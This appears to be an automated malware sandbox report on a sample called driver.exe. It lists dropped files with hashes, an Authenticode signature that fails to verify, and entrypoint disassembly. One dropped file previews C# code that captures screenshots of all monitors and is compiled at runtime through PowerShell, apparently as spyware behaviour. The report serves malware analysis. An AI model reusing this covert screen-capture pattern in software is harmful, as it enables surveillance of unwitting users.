C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tknne5ye.k2g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujqs4xgp.wvm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxq0lvyu.dkq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_woev2xfr.gjx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1042745148089197
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryimak7YnqqB3PN5Dlq5J:+RI+ycuZhNfakSRPNnqX
MD5:	031B2D1AB373BD46DCA2BD5CF52C5A75
SHA1:	C7312AFDC3C296AF0CFF428E86ADE96BDA9F4578
SHA-256:	4970695F7CD3C53C131566AC0514D96CD9EE2DACED2BEDEE736F412FD41FF8AB
SHA-512:	D01E60410F7716AC846D44ED3D85102556F9D2040AF329578806A22E94A68FA8951EE5EB009C15A1AAE6888FA0CE67CB7865311E47A06A6553E9F686ED4F2373
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.36138611280312
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fT:p37Lvkmb6KOkqe1xBkrk+ikqOWZE2D
MD5:	A44DCC242B707B5EB50853A106098165
SHA1:	9000DD3ECA762AF8AEA7593E1EFD8A05B156F3AD
SHA-256:	9AA342D0C57D242F47BA552BBAB581A0DEAB4376226264140FA9C6DCED57B4B8
SHA-512:	5B4F15F00391E10D3C84EA4609982590E788B15A2965C43793988A69AB9B97A29E3BC63AD6AEBBFE9F9613FC7C2EE26A52C254B3E096BB05B57A054919201271
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.0.cs"

C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.159635698934148
Encrypted:	false
SSDEEP:	48:6n7oEAtf0KhzBU/9f6mtJKN00pW1ulfa3jq:5Nz0EmCOStK
MD5:	E0444FDA2C0A79C52FC54B8B9C52FDA5
SHA1:	51BD6EE39B0F273A90F909E8199857DF8DA2A5D0
SHA-256:	355EBF6333E561CE59ED6217FB6F1F688D23E451CEC35F51E48AD78AB6576F0D
SHA-512:	EDD3EDA629A2546F84B2783108E3B0492E99FA7B1E1F5F34FA75AC97FEEAA1EA610BABB7B153C2785D728EE9CE56887FCFFE9BEA9044C1E3F74F317F69149FE1
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1150
Entropy (8bit):	5.501674701850705
Encrypted:	false
SSDEEP:	24:KLaRId3ka6KOkqeFkqPE2iKax5DqBVKVrdFAMBJTH:2kkka6NkqeFkqPE2iK2DcVKdBJj
MD5:	728A46B212A8585A77F6FFD46AEF658E
SHA1:	349A739E72CFE07A6706613574658C7A0ECC3A1C
SHA-256:	392D3061E941E55050BFC62DECB43D87ED35983BC405A9209ABC120D8974AC2F
SHA-512:	198CDE38787EB6F56DDAF3F2618B707B4EAB5F778A40F777567410EF09DAB9751CC8ECE280BECA9435A32677A7C06272D338A6D0CFFB2A3136A5615038BD54DE
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no long

C:\Windows\Logs\SIH\SIH.20250110.050017.352.1.etl

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.290401952603433
Encrypted:	false
SSDEEP:	192:Fl2jCyIKr59vk6Xf0XLXhchXtXCXdblXrXDXCReVmoR:FeCyIKr59vk6Xf0XLXh4XtXCXdRXrXDJ
MD5:	C7BF9B6735FF9A45F2EE2658ADDEDB01
SHA1:	87FF02F09934D26F92A753C9E9BC0BBB02900570
SHA-256:	07B392A8A79F7E24B0ABF11C034BC068F2B710D5E55AA7C3E9E96CF1EEA53735
SHA-512:	15F82059BC7D40BA3577ACF8CDA1F1410F4FB61806808E5D538757DEDBA6DFDEF71FD5E043A7C06F6910524D2D5884DE0FB603063EE9BF0AAA9343F5289B1211
Malicious:	false
Reputation:	unknown
Preview:	....P...P.......................................P...!...............................p...:!.....................eJ.......X.Fc..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............[xsFc..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.1.0...0.5.0.0.1.7...3.5.2...1...e.t.l.......P.P.....p...:!.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP7761.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	17126
Entropy (8bit):	7.3117215578334935
Encrypted:	false
SSDEEP:	192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
MD5:	1B6460EE0273E97C251F7A67F49ACDB4
SHA1:	4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
SHA-256:	3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
SHA-512:	3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
Malicious:	false
Reputation:	unknown
Preview:	MSCF............D................\|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM.........z.;......t.<.o..\|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A....H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0....H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	24490
Entropy (8bit):	7.629144636744632
Encrypted:	false
SSDEEP:	384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
MD5:	ACD24F781C0C8F48A0BD86A0E9F2A154
SHA1:	93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
SHA-256:	5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
SHA-512:	7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
Malicious:	false
Reputation:	unknown
Preview:	MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.\|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G...`-=.w....m..2y.....o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.\|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP5687.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	19826
Entropy (8bit):	7.454351722487538
Encrypted:	false
SSDEEP:	384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
MD5:	455385A0D5098033A4C17F7B85593E6A
SHA1:	E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
SHA-256:	2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
SHA-512:	104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
Malicious:	false
Reputation:	unknown
Preview:	MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f\|..g.7..6..].7B..O..#d..]Ls.k..Le...2...&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,......1.:-....K.......M..;....(,.W.V(^_.....9.,`\|...9...>..R...2\|.\|5.r....n.y>wwU..5...0.J....H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	30005
Entropy (8bit):	7.7369400192915085
Encrypted:	false
SSDEEP:	768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
MD5:	4D7FE667BCB647FE9F2DA6FC8B95BDAE
SHA1:	B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
SHA-256:	BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
SHA-512:	DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
Malicious:	false
Reputation:	unknown
Preview:	MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.\|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.\|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N....5.R...,+...u.~VO...R-......H7..9........].K....]....tS~.LSi....T....3+........k......i.J.y...,.Y\|.N.t.LX.....zu..8......S7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	311
Entropy (8bit):	4.779368010607941
Encrypted:	false
SSDEEP:	6:Pz58wvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PV8w5pTcgTcgTLs4omvtAFSkIrxMVlmo
MD5:	18A051915AD139702C3F18026B231962
SHA1:	F73DBC64DD817FAD7D31DBADCA7AA9DAB3188B3B
SHA-256:	D5232C8E0D121BB2C051D1671E42A5A7714F60D0C46CBD4172E257D0F6E220AB
SHA-512:	CFA51711949D6DCE3C2B6BF2DB650173C8D00F64EB57B30FD7CC569F5EB170CE99A2F977089637F6818F7CD3E7C5E305291DA3C16B39FD3AD170B79A4779E435
Malicious:	false
Reputation:	unknown
Preview:	..Pinging 258555 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994223648048176
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	driver.exe
File size:	8'761'213 bytes
MD5:	d368f3959b9a9ff30d34004d99676729
SHA1:	21f07b36197be39f6db1cf8ae7d9cb1afc750b48
SHA256:	f86f4f262306edd56ac4e433fd053be687ef96f40c7ad7ddf63aae8ec851c499
SHA512:	d7f3b35876c8163873b16dbda8065a3ea7cb081b475ae0f06fe78794c426728d63cecedb84eba7b649d7eaae2237a1ebfce8c9be4ed292a7bdb2606d23719da1
SSDEEP:	196608:H9DRkd7lwfI9jUCBB7m+mKOY7rXrZu6SELooDmhfvsbnTNWZ:datKIHL7HmBYXrkRoaUNK
TLSH:	6196338666D104FAF937A83ED4928E1BCB327D215B70DA97437487754EB39F1082A327
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6780E6E4 [Fri Jan 10 09:22:44 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F0D58863ACCh
dec eax
add esp, 28h
jmp 00007F0D588636EFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F0D58863E98h
test eax, eax
je 00007F0D58863893h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F0D58863877h
dec eax
cmp ecx, eax
je 00007F0D58863886h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F0D58863860h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F0D58863869h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F0D58863879h
mov byte ptr [000356F5h], 00000001h
call 00007F0D58862FC5h
call 00007F0D588642B0h
test al, al
jne 00007F0D58863876h
xor al, al
jmp 00007F0D58863886h
call 00007F0D58870DCFh
test al, al
jne 00007F0D5886387Bh
xor ecx, ecx
call 00007F0D588642C0h
jmp 00007F0D5886385Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F0D588638D9h
cmp ecx, 01h
jnbe 00007F0D588638DCh
call 00007F0D58863E0Eh
test eax, eax
je 00007F0D5886389Ah
test ebx, ebx
jne 00007F0D58863896h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F0D58870BC2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
